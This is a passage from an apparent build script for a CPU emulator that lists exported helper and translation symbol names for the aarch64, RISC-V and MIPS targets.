helper_sve_ldsds_be_zss \ helper_sve_ldsds_be_zd \ helper_sve_lddd_le_zsu \ helper_sve_lddd_le_zss \ helper_sve_lddd_le_zd \ helper_sve_lddd_be_zsu \ helper_sve_lddd_be_zss \ helper_sve_lddd_be_zd \ helper_sve_ldffbsu_zsu \ helper_sve_ldffbsu_zss \ helper_sve_ldffbdu_zsu \ helper_sve_ldffbdu_zss \ helper_sve_ldffbdu_zd \ helper_sve_ldffbss_zsu \ helper_sve_ldffbss_zss \ helper_sve_ldffbds_zsu \ helper_sve_ldffbds_zss \ helper_sve_ldffbds_zd \ helper_sve_ldffhsu_le_zsu \ helper_sve_ldffhsu_le_zss \ helper_sve_ldffhdu_le_zsu \ helper_sve_ldffhdu_le_zss \ helper_sve_ldffhdu_le_zd \ helper_sve_ldffhsu_be_zsu \ helper_sve_ldffhsu_be_zss \ helper_sve_ldffhdu_be_zsu \ helper_sve_ldffhdu_be_zss \ helper_sve_ldffhdu_be_zd \ helper_sve_ldffhss_le_zsu \ helper_sve_ldffhss_le_zss \ helper_sve_ldffhds_le_zsu \ helper_sve_ldffhds_le_zss \ helper_sve_ldffhds_le_zd \ helper_sve_ldffhss_be_zsu \ helper_sve_ldffhss_be_zss \ helper_sve_ldffhds_be_zsu \ helper_sve_ldffhds_be_zss \ helper_sve_ldffhds_be_zd \ helper_sve_ldffss_le_zsu \ helper_sve_ldffss_le_zss \ helper_sve_ldffsdu_le_zsu \ helper_sve_ldffsdu_le_zss \ helper_sve_ldffsdu_le_zd \ helper_sve_ldffss_be_zsu \ helper_sve_ldffss_be_zss \ helper_sve_ldffsdu_be_zsu \ helper_sve_ldffsdu_be_zss \ helper_sve_ldffsdu_be_zd \ helper_sve_ldffsds_le_zsu \ helper_sve_ldffsds_le_zss \ helper_sve_ldffsds_le_zd \ helper_sve_ldffsds_be_zsu \ helper_sve_ldffsds_be_zss \ helper_sve_ldffsds_be_zd \ helper_sve_ldffdd_le_zsu \ helper_sve_ldffdd_le_zss \ helper_sve_ldffdd_le_zd \ helper_sve_ldffdd_be_zsu \ helper_sve_ldffdd_be_zss \ helper_sve_ldffdd_be_zd \ helper_sve_stbs_zsu \ helper_sve_sths_le_zsu \ helper_sve_sths_be_zsu \ helper_sve_stss_le_zsu \ helper_sve_stss_be_zsu \ helper_sve_stbs_zss \ helper_sve_sths_le_zss \ helper_sve_sths_be_zss \ helper_sve_stss_le_zss \ helper_sve_stss_be_zss \ helper_sve_stbd_zsu \ helper_sve_sthd_le_zsu \ helper_sve_sthd_be_zsu \ helper_sve_stsd_le_zsu \ helper_sve_stsd_be_zsu \ helper_sve_stdd_le_zsu \ helper_sve_stdd_be_zsu \ helper_sve_stbd_zss \ helper_sve_sthd_le_zss \ helper_sve_sthd_be_zss \ helper_sve_stsd_le_zss \ helper_sve_stsd_be_zss \ helper_sve_stdd_le_zss \ helper_sve_stdd_be_zss \ helper_sve_stbd_zd \ helper_sve_sthd_le_zd \ helper_sve_sthd_be_zd \ helper_sve_stsd_le_zd \ helper_sve_stsd_be_zd \ helper_sve_stdd_le_zd \ helper_sve_stdd_be_zd \ arm_cpu_do_unaligned_access \ arm_cpu_do_transaction_failed \ arm_cpu_tlb_fill \ a64_translate_init \ gen_a64_set_pc_im \ unallocated_encoding \ new_tmp_a64 \ new_tmp_a64_zero \ cpu_reg \ cpu_reg_sp \ read_cpu_reg \ read_cpu_reg_sp \ write_fp_dreg \ get_fpstatus_ptr \ sve_access_check \ logic_imm_decode_wmask \ arm_translate_init \ arm_test_cc \ arm_free_cc \ arm_jump_cc \ arm_gen_test_cc \ vfp_expand_imm \ gen_cmtst_i64 \ gen_ushl_i32 \ gen_ushl_i64 \ gen_sshl_i32 \ gen_sshl_i64 \ gen_intermediate_code \ restore_state_to_opc \ disas_sve \ helper_neon_qrdmlah_s16 \ helper_gvec_qrdmlah_s16 \ helper_neon_qrdmlsh_s16 \ helper_gvec_qrdmlsh_s16 \ helper_neon_qrdmlah_s32 \ helper_gvec_qrdmlah_s32 \ helper_neon_qrdmlsh_s32 \ helper_gvec_qrdmlsh_s32 \ helper_gvec_sdot_b \ helper_gvec_udot_b \ helper_gvec_sdot_h \ helper_gvec_udot_h \ helper_gvec_sdot_idx_b \ helper_gvec_udot_idx_b \ helper_gvec_sdot_idx_h \ helper_gvec_udot_idx_h \ helper_gvec_fcaddh \ helper_gvec_fcadds \ helper_gvec_fcaddd \ helper_gvec_fcmlah \ helper_gvec_fcmlah_idx \ helper_gvec_fcmlas \ helper_gvec_fcmlas_idx \ helper_gvec_fcmlad \ helper_gvec_frecpe_h \ helper_gvec_frecpe_s \ helper_gvec_frecpe_d \ helper_gvec_frsqrte_h \ helper_gvec_frsqrte_s \ helper_gvec_frsqrte_d \ helper_gvec_fadd_h \ helper_gvec_fadd_s \ helper_gvec_fadd_d \ helper_gvec_fsub_h \ helper_gvec_fsub_s \ helper_gvec_fsub_d \ helper_gvec_fmul_h \ helper_gvec_fmul_s \ helper_gvec_fmul_d \ helper_gvec_ftsmul_h \ helper_gvec_ftsmul_s \ helper_gvec_ftsmul_d \ helper_gvec_recps_h \ helper_gvec_recps_s \ helper_gvec_recps_d \ helper_gvec_rsqrts_h \ helper_gvec_rsqrts_s \ helper_gvec_rsqrts_d \ helper_gvec_fmul_idx_h \ helper_gvec_fmul_idx_s \ helper_gvec_fmul_idx_d \ helper_gvec_fmla_idx_h \ helper_gvec_fmla_idx_s \ helper_gvec_fmla_idx_d \ helper_gvec_uqadd_b \ helper_gvec_uqadd_h \ helper_gvec_uqadd_s \ helper_gvec_sqadd_b \ helper_gvec_sqadd_h \ helper_gvec_sqadd_s \ helper_gvec_uqsub_b \ helper_gvec_uqsub_h \ helper_gvec_uqsub_s \ helper_gvec_sqsub_b \ helper_gvec_sqsub_h \ helper_gvec_sqsub_s \ helper_gvec_uqadd_d \ helper_gvec_uqsub_d \ helper_gvec_sqadd_d \ helper_gvec_sqsub_d \ helper_gvec_fmlal_a32 \ helper_gvec_fmlal_a64 \ helper_gvec_fmlal_idx_a32 \ helper_gvec_fmlal_idx_a64 \ helper_gvec_sshl_b \ helper_gvec_sshl_h \ helper_gvec_ushl_b \ helper_gvec_ushl_h \ helper_gvec_pmul_b \ helper_gvec_pmull_q \ helper_neon_pmull_h \ helper_sve2_pmull_h \ helper_vfp_get_fpscr \ vfp_get_fpscr \ helper_vfp_set_fpscr \ vfp_set_fpscr \ helper_vfp_adds \ helper_vfp_addd \ helper_vfp_subs \ helper_vfp_subd \ helper_vfp_muls \ helper_vfp_muld \ helper_vfp_divs \ helper_vfp_divd \ helper_vfp_mins \ helper_vfp_mind \ helper_vfp_maxs \ helper_vfp_maxd \ helper_vfp_minnums \ helper_vfp_minnumd \ helper_vfp_maxnums \ helper_vfp_maxnumd \ helper_vfp_negs \ helper_vfp_negd \ helper_vfp_abss \ helper_vfp_absd \ helper_vfp_sqrts \ helper_vfp_sqrtd \ helper_vfp_cmps \ helper_vfp_cmpes \ helper_vfp_cmpd \ helper_vfp_cmped \ helper_vfp_sitoh \ helper_vfp_tosih \ helper_vfp_tosizh \ helper_vfp_sitos \ helper_vfp_tosis \ helper_vfp_tosizs \ helper_vfp_sitod \ helper_vfp_tosid \ helper_vfp_tosizd \ helper_vfp_uitoh \ helper_vfp_touih \ helper_vfp_touizh \ helper_vfp_uitos \ helper_vfp_touis \ helper_vfp_touizs \ helper_vfp_uitod \ helper_vfp_touid \ helper_vfp_touizd \ helper_vfp_fcvtds \ helper_vfp_fcvtsd \ helper_vfp_shtod \ helper_vfp_toshd_round_to_zero \ helper_vfp_toshd \ helper_vfp_sltod \ helper_vfp_tosld_round_to_zero \ helper_vfp_tosld \ helper_vfp_sqtod \ helper_vfp_tosqd \ helper_vfp_uhtod \ helper_vfp_touhd_round_to_zero \ helper_vfp_touhd \ helper_vfp_ultod \ helper_vfp_tould_round_to_zero \ helper_vfp_tould \ helper_vfp_uqtod \ helper_vfp_touqd \ helper_vfp_shtos \ helper_vfp_toshs_round_to_zero \ helper_vfp_toshs \ helper_vfp_sltos \ helper_vfp_tosls_round_to_zero \ helper_vfp_tosls \ helper_vfp_sqtos \ helper_vfp_tosqs \ helper_vfp_uhtos \ helper_vfp_touhs_round_to_zero \ helper_vfp_touhs \ helper_vfp_ultos \ helper_vfp_touls_round_to_zero \ helper_vfp_touls \ helper_vfp_uqtos \ helper_vfp_touqs \ helper_vfp_sltoh \ helper_vfp_ultoh \ helper_vfp_sqtoh \ helper_vfp_uqtoh \ helper_vfp_toshh \ helper_vfp_touhh \ helper_vfp_toslh \ helper_vfp_toulh \ helper_vfp_tosqh \ helper_vfp_touqh \ helper_set_rmode \ helper_set_neon_rmode \ helper_vfp_fcvt_f16_to_f32 \ helper_vfp_fcvt_f32_to_f16 \ helper_vfp_fcvt_f16_to_f64 \ helper_vfp_fcvt_f64_to_f16 \ helper_recps_f32 \ helper_rsqrts_f32 \ helper_recpe_f16 \ helper_recpe_f32 \ helper_recpe_f64 \ helper_rsqrte_f16 \ helper_rsqrte_f32 \ helper_rsqrte_f64 \ helper_recpe_u32 \ helper_rsqrte_u32 \ helper_vfp_muladds \ helper_vfp_muladdd \ helper_rints_exact \ helper_rintd_exact \ helper_rints \ helper_rintd \ arm_rmode_to_sf \ helper_fjcvtzs \ helper_vjcvt \ helper_frint32_s \ helper_frint64_s \ helper_frint32_d \ helper_frint64_d \ helper_check_hcr_el2_trap \ mla_op \ mls_op \ sshl_op \ ushl_op \ uqsub_op \ sqsub_op \ uqadd_op \ sqadd_op \ sli_op \ cmtst_op \ sri_op \ usra_op \ ssra_op \ aarch64_translator_ops \ pred_esz_masks \ helper_uc_hooksys64 \ " riscv32_SYMBOLS=" riscv_cpu_mmu_index \ riscv_cpu_exec_interrupt \ riscv_cpu_fp_enabled \ riscv_cpu_swap_hypervisor_regs \ riscv_cpu_virt_enabled \ riscv_cpu_set_virt_enabled \ riscv_cpu_force_hs_excep_enabled \ riscv_cpu_set_force_hs_excep \ riscv_cpu_claim_interrupts \ riscv_cpu_update_mip \ riscv_cpu_set_rdtime_fn \ riscv_cpu_set_mode \ riscv_cpu_get_phys_page_debug \ riscv_cpu_do_transaction_failed \ riscv_cpu_do_unaligned_access \ riscv_cpu_tlb_fill \ riscv_cpu_do_interrupt \ riscv_get_csr_ops \ riscv_set_csr_ops \ riscv_csrrw \ riscv_csrrw_debug \ riscv_cpu_get_fflags \ riscv_cpu_set_fflags \ helper_set_rounding_mode \ helper_fmadd_s \ helper_fmadd_d \ helper_fmsub_s \ helper_fmsub_d \ helper_fnmsub_s \ helper_fnmsub_d \ helper_fnmadd_s \ helper_fnmadd_d \ helper_fadd_s \ helper_fsub_s \ helper_fmul_s \ helper_fdiv_s \ helper_fmin_s \ helper_fmax_s \ helper_fsqrt_s \ helper_fle_s \ helper_flt_s \ helper_feq_s \ helper_fcvt_w_s \ helper_fcvt_wu_s \ helper_fcvt_s_w \ helper_fcvt_s_wu \ helper_fclass_s \ helper_fadd_d \ helper_fsub_d \ helper_fmul_d \ helper_fdiv_d \ helper_fmin_d \ helper_fmax_d \ helper_fcvt_s_d \ helper_fcvt_d_s \ helper_fsqrt_d \ helper_fle_d \ helper_flt_d \ helper_feq_d \ helper_fcvt_w_d \ helper_fcvt_wu_d \ helper_fcvt_d_w \ helper_fcvt_d_wu \ helper_fclass_d \ riscv_raise_exception \ helper_raise_exception \ helper_uc_riscv_exit \ helper_csrrw \ helper_csrrs \ helper_csrrc \ helper_sret \ helper_mret \ helper_wfi \ helper_tlb_flush \ pmp_hart_has_privs \ pmpcfg_csr_write \ pmpcfg_csr_read \ pmpaddr_csr_write \ pmpaddr_csr_read \ gen_intermediate_code \ riscv_translate_init \ restore_state_to_opc \ cpu_riscv_init \ helper_fcvt_l_s \ helper_fcvt_lu_s \ helper_fcvt_s_l \ helper_fcvt_s_lu \ helper_fcvt_l_d \ helper_fcvt_lu_d \ helper_fcvt_d_l \ helper_fcvt_d_lu \ gen_helper_tlb_flush \ riscv_fpr_regnames \ riscv_int_regnames \ " riscv64_SYMBOLS=${riscv32_SYMBOLS} mips_SYMBOLS=" helper_mfc0_mvpcontrol \ helper_mfc0_mvpconf0 \ helper_mfc0_mvpconf1 \ helper_mfc0_random \ helper_mfc0_tcstatus \ helper_mftc0_tcstatus \ helper_mfc0_tcbind \ helper_mftc0_tcbind \ helper_mfc0_tcrestart \ helper_mftc0_tcrestart \ helper_mfc0_tchalt \ helper_mftc0_tchalt \ helper_mfc0_tccontext \ helper_mftc0_tccontext \ helper_mfc0_tcschedule \ helper_mftc0_tcschedule \ helper_mfc0_tcschefback \ helper_mftc0_tcschefback \ helper_mfc0_count \ helper_mfc0_saar \ helper_mfhc0_saar \ helper_mftc0_entryhi \ helper_mftc0_cause \ helper_mftc0_status \ helper_mfc0_lladdr \ helper_mfc0_maar \ helper_mfhc0_maar \ helper_mfc0_watchlo \ helper_mfc0_watchhi \ helper_mfhc0_watchhi \ helper_mfc0_debug \ helper_mftc0_debug \ helper_dmfc0_tcrestart \ helper_dmfc0_tchalt \ helper_dmfc0_tccontext \ helper_dmfc0_tcschedule \ helper_dmfc0_tcschefback \ helper_dmfc0_lladdr \ helper_dmfc0_maar \ helper_dmfc0_watchlo \ helper_dmfc0_watchhi \ helper_dmfc0_saar \ helper_mtc0_index \ helper_mtc0_mvpcontrol \ helper_mtc0_vpecontrol \ helper_mttc0_vpecontrol \ helper_mftc0_vpecontrol \ helper_mftc0_vpeconf0 \ helper_mtc0_vpeconf0 \ helper_mttc0_vpeconf0 \ helper_mtc0_vpeconf1 \ helper_mtc0_yqmask \ helper_mtc0_vpeopt \ helper_mtc0_entrylo0 \ helper_dmtc0_entrylo0 \ helper_mtc0_tcstatus \ helper_mttc0_tcstatus \ helper_mtc0_tcbind \ helper_mttc0_tcbind \ helper_mtc0_tcrestart \ helper_mttc0_tcrestart \ helper_mtc0_tchalt \ helper_mttc0_tchalt \ helper_mtc0_tccontext \ helper_mttc0_tccontext \ helper_mtc0_tcschedule \ helper_mttc0_tcschedule \ helper_mtc0_tcschefback \ helper_mttc0_tcschefback \ helper_mtc0_entrylo1 \ helper_dmtc0_entrylo1 \ helper_mtc0_context \ helper_mtc0_memorymapid \ update_pagemask \ helper_mtc0_pagemask \ helper_mtc0_pagegrain \ helper_mtc0_segctl0 \ helper_mtc0_segctl1 \ helper_mtc0_segctl2 \ helper_mtc0_pwfield \ helper_mtc0_pwsize \ helper_mtc0_wired \ helper_mtc0_pwctl \ helper_mtc0_srsconf0 \ helper_mtc0_srsconf1 \ helper_mtc0_srsconf2 \ helper_mtc0_srsconf3 \ helper_mtc0_srsconf4 \ helper_mtc0_hwrena \ helper_mtc0_count \ helper_mtc0_saari \ helper_mtc0_saar \ helper_mthc0_saar \ helper_mtc0_entryhi \ helper_mttc0_entryhi \ helper_mtc0_compare \ helper_mtc0_status \ helper_mttc0_status \ helper_mtc0_intctl \ helper_mtc0_srsctl \ helper_mtc0_cause \ helper_mttc0_cause \ helper_mftc0_epc \ helper_mftc0_ebase \ helper_mtc0_ebase \ helper_mttc0_ebase \ helper_mftc0_configx \ helper_mtc0_config0 \ helper_mtc0_config2 \ helper_mtc0_config3 \ helper_mtc0_config4 \ helper_mtc0_config5 \ helper_mtc0_lladdr \ helper_mtc0_maar \ helper_mthc0_maar \ helper_mtc0_maari \ helper_mtc0_watchlo \ helper_mtc0_watchhi \ helper_mthc0_watchhi \ helper_mtc0_xcontext \ helper_mtc0_framemask \ helper_mtc0_debug \ helper_mttc0_debug \ helper_mtc0_performance0 \ helper_mtc0_errctl \ helper_mtc0_taglo \ helper_mtc0_datalo \ helper_mtc0_taghi \ helper_mtc0_datahi \ helper_mftgpr \ helper_mftlo \ helper_mfthi \ helper_mftacx \ helper_mftdsp \ helper_mttgpr \ helper_mttlo \ helper_mtthi \ helper_mttacx \ helper_mttdsp \ helper_dmt \ helper_emt \ helper_dvpe \ helper_evpe \ helper_dvp \ helper_evp \ cpu_mips_get_random \ cpu_mips_init \ helper_absq_s_ph \ helper_absq_s_qb \ helper_absq_s_w \ helper_absq_s_ob \ helper_absq_s_qh \ helper_absq_s_pw \ helper_addqh_ph \ helper_addqh_r_ph \ helper_addqh_r_w \ helper_addqh_w \ helper_adduh_qb \ helper_adduh_r_qb \ helper_subqh_ph \ helper_subqh_r_ph \ helper_subqh_r_w \ helper_subqh_w \ helper_addq_ph \ helper_addq_s_ph \ helper_addq_s_w \ helper_addu_ph \ helper_addu_qb \ helper_addu_s_ph \ helper_addu_s_qb \ helper_subq_ph \ helper_subq_s_ph \ helper_subq_s_w \ helper_subu_ph \ helper_subu_qb \ helper_subu_s_ph \ helper_subu_s_qb \ helper_adduh_ob \ helper_adduh_r_ob \ helper_subuh_ob \ helper_subuh_r_ob \ helper_addq_pw \ helper_addq_qh \ helper_addq_s_pw \ helper_addq_s_qh \ helper_addu_ob \ helper_addu_qh \ helper_addu_s_ob \ helper_addu_s_qh \ helper_subq_pw \ helper_subq_qh \ helper_subq_s_pw \ helper_subq_s_qh \ helper_subu_ob \ helper_subu_qh \ helper_subu_s_ob \ helper_subu_s_qh \ helper_subuh_qb \ helper_subuh_r_qb \ helper_addsc \ helper_addwc \ helper_modsub \ helper_raddu_w_qb \ helper_raddu_l_ob \ helper_precr_qb_ph \ helper_precrq_qb_ph \ helper_precr_sra_ph_w \ helper_precr_sra_r_ph_w \ helper_precrq_ph_w \ helper_precrq_rs_ph_w \ helper_precr_ob_qh \ helper_precr_sra_qh_pw \ helper_precr_sra_r_qh_pw \ helper_precrq_ob_qh \ helper_precrq_qh_pw \ helper_precrq_rs_qh_pw \ helper_precrq_pw_l \ helper_precrqu_s_qb_ph \ helper_precrqu_s_ob_qh \ helper_preceq_pw_qhl \ helper_preceq_pw_qhr \ helper_preceq_pw_qhla \ helper_preceq_pw_qhra \ helper_precequ_ph_qbl \ helper_precequ_ph_qbr \ helper_precequ_ph_qbla \ helper_precequ_ph_qbra \ helper_precequ_qh_obl \ helper_precequ_qh_obr \ helper_precequ_qh_obla \ helper_precequ_qh_obra \ helper_preceu_ph_qbl \ helper_preceu_ph_qbr \ helper_preceu_ph_qbla \ helper_preceu_ph_qbra \ helper_preceu_qh_obl \ helper_preceu_qh_obr \ helper_preceu_qh_obla \ helper_preceu_qh_obra \ helper_shll_qb \ helper_shrl_qb \ helper_shra_qb \ helper_shra_r_qb \ helper_shll_ob \ helper_shrl_ob \ helper_shra_ob \ helper_shra_r_ob \ helper_shll_ph \ helper_shll_s_ph \ helper_shll_qh \ helper_shll_s_qh \ helper_shrl_qh \ helper_shra_qh \ helper_shra_r_qh \ helper_shll_s_w \ helper_shra_r_w \ helper_shll_pw \ helper_shll_s_pw \ helper_shra_pw \ helper_shra_r_pw \ helper_shrl_ph \ helper_shra_ph \ helper_shra_r_ph \ helper_muleu_s_ph_qbl \ helper_muleu_s_ph_qbr \ helper_mulq_rs_ph \ helper_mul_ph \ helper_mul_s_ph \ helper_mulq_s_ph \ helper_muleq_s_w_phl \ helper_muleq_s_w_phr \ helper_mulsaq_s_w_ph \ helper_mulsa_w_ph \ helper_muleu_s_qh_obl \ helper_muleu_s_qh_obr \ helper_mulq_rs_qh \ helper_muleq_s_pw_qhl \ helper_muleq_s_pw_qhr \ helper_mulsaq_s_w_qh \ helper_dpau_h_qbl \ helper_dpau_h_qbr \ helper_dpsu_h_qbl \ helper_dpsu_h_qbr \ helper_dpau_h_obl \ helper_dpau_h_obr \ helper_dpsu_h_obl \ helper_dpsu_h_obr \ helper_dpa_w_ph \ helper_dpax_w_ph \ helper_dps_w_ph \ helper_dpsx_w_ph \ helper_dpaq_s_w_ph \ helper_dpaqx_s_w_ph \ helper_dpsq_s_w_ph \ helper_dpsqx_s_w_ph \ helper_dpaqx_sa_w_ph \ helper_dpsqx_sa_w_ph \ helper_dpa_w_qh \ helper_dpaq_s_w_qh \ helper_dps_w_qh \ helper_dpsq_s_w_qh \ helper_dpaq_sa_l_w \ helper_dpsq_sa_l_w \ helper_dpaq_sa_l_pw \ helper_dpsq_sa_l_pw \ helper_mulsaq_s_l_pw \ helper_maq_s_w_phl \ helper_maq_s_w_phr \ helper_maq_sa_w_phl \ helper_maq_sa_w_phr \ helper_mulq_s_w \ helper_mulq_rs_w \ helper_maq_s_w_qhll \ helper_maq_s_w_qhlr \ helper_maq_s_w_qhrl \ helper_maq_s_w_qhrr \ helper_maq_sa_w_qhll \ helper_maq_sa_w_qhlr \ helper_maq_sa_w_qhrl \ helper_maq_sa_w_qhrr \ helper_maq_s_l_pwl \ helper_maq_s_l_pwr \ helper_dmadd \ helper_dmaddu \ helper_dmsub \ helper_dmsubu \ helper_bitrev \ helper_insv \ helper_dinsv \ helper_cmpgu_eq_qb \ helper_cmpgu_lt_qb \ helper_cmpgu_le_qb \ helper_cmpgu_eq_ob \ helper_cmpgu_lt_ob \ helper_cmpgu_le_ob \ helper_cmpu_eq_qb \ helper_cmpu_lt_qb \ helper_cmpu_le_qb \ helper_cmp_eq_ph \ helper_cmp_lt_ph \ helper_cmp_le_ph \ helper_cmpu_eq_ob \ helper_cmpu_lt_ob \ helper_cmpu_le_ob \ helper_cmp_eq_qh \ helper_cmp_lt_qh \ helper_cmp_le_qh \ helper_cmp_eq_pw \ helper_cmp_lt_pw \ helper_cmp_le_pw \ helper_cmpgdu_eq_ob \ helper_cmpgdu_lt_ob \ helper_cmpgdu_le_ob \ helper_pick_qb \ helper_pick_ph \ helper_pick_ob \ helper_pick_qh \ helper_pick_pw \ helper_packrl_ph \ helper_packrl_pw \ helper_extr_w \ helper_extr_r_w \ helper_extr_rs_w \ helper_dextr_w \ helper_dextr_r_w \ helper_dextr_rs_w \ helper_dextr_l \ helper_dextr_r_l \ helper_dextr_rs_l \ helper_extr_s_h \ helper_dextr_s_h \ helper_extp \ helper_extpdp \ helper_dextp \ helper_dextpdp \ helper_shilo \ helper_dshilo \ helper_mthlip \ helper_dmthlip \ cpu_wrdsp \ helper_wrdsp \ cpu_rddsp \ helper_rddsp \ helper_cfc1 \ helper_ctc1 \ ieee_ex_to_mips \ helper_float_sqrt_d \ helper_float_sqrt_s \ helper_float_cvtd_s \ helper_float_cvtd_w \ helper_float_cvtd_l \ helper_float_cvt_l_d \ helper_float_cvt_l_s \ helper_float_cvtps_pw \ helper_float_cvtpw_ps \ helper_float_cvts_d \ helper_float_cvts_w \ helper_float_cvts_l \ helper_float_cvts_pl \ helper_float_cvts_pu \ helper_float_cvt_w_s \ helper_float_cvt_w_d \ helper_float_round_l_d \ helper_float_round_l_s \ helper_float_round_w_d \ helper_float_round_w_s \ helper_float_trunc_l_d \ helper_float_trunc_l_s \ helper_float_trunc_w_d \ helper_float_trunc_w_s \ helper_float_ceil_l_d \ helper_float_ceil_l_s \ helper_float_ceil_w_d \ helper_float_ceil_w_s \ helper_float_floor_l_d \ helper_float_floor_l_s \ helper_float_floor_w_d \ helper_float_floor_w_s \ helper_float_cvt_2008_l_d \ helper_float_cvt_2008_l_s \ helper_float_cvt_2008_w_d \ helper_float_cvt_2008_w_s \ helper_float_round_2008_l_d \ helper_float_round_2008_l_s \ helper_float_round_2008_w_d \ helper_float_round_2008_w_s \ helper_float_trunc_2008_l_d \ helper_float_trunc_2008_l_s \ helper_float_trunc_2008_w_d \ helper_float_trunc_2008_w_s \ helper_float_ceil_2008_l_d \ helper_float_ceil_2008_l_s \ helper_float_ceil_2008_w_d \ helper_float_ceil_2008_w_s \ helper_float_floor_2008_l_d \ helper_float_floor_2008_l_s \ helper_float_floor_2008_w_d \ helper_float_floor_2008_w_s \ helper_float_abs_d \ helper_float_abs_s \ helper_float_abs_ps \ helper_float_chs_d \ helper_float_chs_s \ helper_float_chs_ps \ helper_float_recip_d \ helper_float_recip_s \ helper_float_rsqrt_d \ helper_float_rsqrt_s \ helper_float_recip1_d \ helper_float_recip1_s \ helper_float_recip1_ps \ helper_float_rsqrt1_d \ helper_float_rsqrt1_s \ helper_float_rsqrt1_ps \ helper_float_rint_s \ helper_float_rint_d \ float_class_s \ helper_float_class_s \ float_class_d \ helper_float_class_d \ helper_float_add_d \ helper_float_add_s \ helper_float_add_ps \ helper_float_sub_d \ helper_float_sub_s \ helper_float_sub_ps \ helper_float_mul_d \ helper_float_mul_s \ helper_float_mul_ps \ helper_float_div_d \ helper_float_div_s \ helper_float_div_ps \ helper_float_recip2_d \ helper_float_recip2_s \ helper_float_recip2_ps \ helper_float_rsqrt2_d \ helper_float_rsqrt2_s \ helper_float_rsqrt2_ps \ helper_float_addr_ps \ helper_float_mulr_ps \ helper_float_max_s \ helper_float_max_d \ helper_float_maxa_s \ helper_float_maxa_d \ helper_float_min_s \ helper_float_min_d \ helper_float_mina_s \ helper_float_mina_d \ helper_float_madd_d \ helper_float_madd_s \ helper_float_madd_ps \ helper_float_msub_d \ helper_float_msub_s \ helper_float_msub_ps \ helper_float_nmadd_d \ helper_float_nmadd_s \ helper_float_nmadd_ps \ helper_float_nmsub_d \ helper_float_nmsub_s \ helper_float_nmsub_ps \ helper_float_maddf_s \ helper_float_maddf_d \ helper_float_msubf_s \ helper_float_msubf_d \ helper_cmp_d_f \ helper_cmpabs_d_f \ helper_cmp_d_un \ helper_cmpabs_d_un \ helper_cmp_d_eq \ helper_cmpabs_d_eq \ helper_cmp_d_ueq \ helper_cmpabs_d_ueq \ helper_cmp_d_olt \ helper_cmpabs_d_olt \ helper_cmp_d_ult \ helper_cmpabs_d_ult \ helper_cmp_d_ole \ helper_cmpabs_d_ole \ helper_cmp_d_ule \ helper_cmpabs_d_ule \ helper_cmp_d_sf \ helper_cmpabs_d_sf \ helper_cmp_d_ngle \ helper_cmpabs_d_ngle \ helper_cmp_d_seq \ helper_cmpabs_d_seq \ helper_cmp_d_ngl \ helper_cmpabs_d_ngl \ helper_cmp_d_lt \ helper_cmpabs_d_lt \ helper_cmp_d_nge \ helper_cmpabs_d_nge \ helper_cmp_d_le \ helper_cmpabs_d_le \ helper_cmp_d_ngt \ helper_cmpabs_d_ngt \ helper_cmp_s_f \ helper_cmpabs_s_f \ helper_cmp_s_un \ helper_cmpabs_s_un \ helper_cmp_s_eq \ helper_cmpabs_s_eq \ helper_cmp_s_ueq \ helper_cmpabs_s_ueq \ helper_cmp_s_olt \ helper_cmpabs_s_olt \ helper_cmp_s_ult \ helper_cmpabs_s_ult \ helper_cmp_s_ole \ helper_cmpabs_s_ole \ helper_cmp_s_ule \ helper_cmpabs_s_ule \ helper_cmp_s_sf \ helper_cmpabs_s_sf \ helper_cmp_s_ngle \ helper_cmpabs_s_ngle \ helper_cmp_s_seq \ helper_cmpabs_s_seq \ helper_cmp_s_ngl \ helper_cmpabs_s_ngl \ helper_cmp_s_lt \ helper_cmpabs_s_lt \ helper_cmp_s_nge \ helper_cmpabs_s_nge \ helper_cmp_s_le \ helper_cmpabs_s_le \ helper_cmp_s_ngt \ helper_cmpabs_s_ngt \ helper_cmp_ps_f \ helper_cmpabs_ps_f \ helper_cmp_ps_un \ helper_cmpabs_ps_un \ helper_cmp_ps_eq \ helper_cmpabs_ps_eq \ helper_cmp_ps_ueq \ helper_cmpabs_ps_ueq \ helper_cmp_ps_olt \ helper_cmpabs_ps_olt \ helper_cmp_ps_ult \ helper_cmpabs_ps_ult \ helper_cmp_ps_ole \ helper_cmpabs_ps_ole \ helper_cmp_ps_ule \ helper_cmpabs_ps_ule \ helper_cmp_ps_sf \ helper_cmpabs_ps_sf \ helper_cmp_ps_ngle \ helper_cmpabs_ps_ngle \ helper_cmp_ps_seq \ helper_cmpabs_ps_seq \ helper_cmp_ps_ngl \ helper_cmpabs_ps_ngl \ helper_cmp_ps_lt \ helper_cmpabs_ps_lt \ helper_cmp_ps_nge \ helper_cmpabs_ps_nge \ helper_cmp_ps_le \ helper_cmpabs_ps_le \ helper_cmp_ps_ngt \ helper_cmpabs_ps_ngt \ helper_r6_cmp_d_af \ helper_r6_cmp_d_un \ helper_r6_cmp_d_eq \ helper_r6_cmp_d_ueq \ helper_r6_cmp_d_lt \ helper_r6_cmp_d_ult \ helper_r6_cmp_d_le \ helper_r6_cmp_d_ule \ helper_r6_cmp_d_saf \ helper_r6_cmp_d_sun \ helper_r6_cmp_d_seq \ helper_r6_cmp_d_sueq \ helper_r6_cmp_d_slt \ helper_r6_cmp_d_sult \ helper_r6_cmp_d_sle \ helper_r6_cmp_d_sule \ helper_r6_cmp_d_or \ helper_r6_cmp_d_une \ helper_r6_cmp_d_ne \ helper_r6_cmp_d_sor \ helper_r6_cmp_d_sune \ helper_r6_cmp_d_sne \ helper_r6_cmp_s_af \ helper_r6_cmp_s_un \ helper_r6_cmp_s_eq \ helper_r6_cmp_s_ueq \ helper_r6_cmp_s_lt \ helper_r6_cmp_s_ult \ helper_r6_cmp_s_le \ helper_r6_cmp_s_ule \ helper_r6_cmp_s_saf \ helper_r6_cmp_s_sun \ helper_r6_cmp_s_seq \ helper_r6_cmp_s_sueq \ helper_r6_cmp_s_slt \ helper_r6_cmp_s_sult \ helper_r6_cmp_s_sle \ helper_r6_cmp_s_sule \ helper_r6_cmp_s_or \ helper_r6_cmp_s_une \ helper_r6_cmp_s_ne \ helper_r6_cmp_s_sor \ helper_r6_cmp_s_sune \ helper_r6_cmp_s_sne \ no_mmu_map_address \ fixed_mmu_map_address \ r4k_map_address \ cpu_mips_tlb_flush \ sync_c0_status \ cpu_mips_store_status \ cpu_mips_store_cause \ mips_cpu_get_phys_page_debug \ mips_cpu_tlb_fill \ cpu_mips_translate_address \ exception_resume_pc \ mips_cpu_do_interrupt \ mips_cpu_exec_interrupt \ r4k_invalidate_tlb \ do_raise_exception_err \ helper_paddsb \ helper_paddusb \ helper_paddsh \ helper_paddush \ 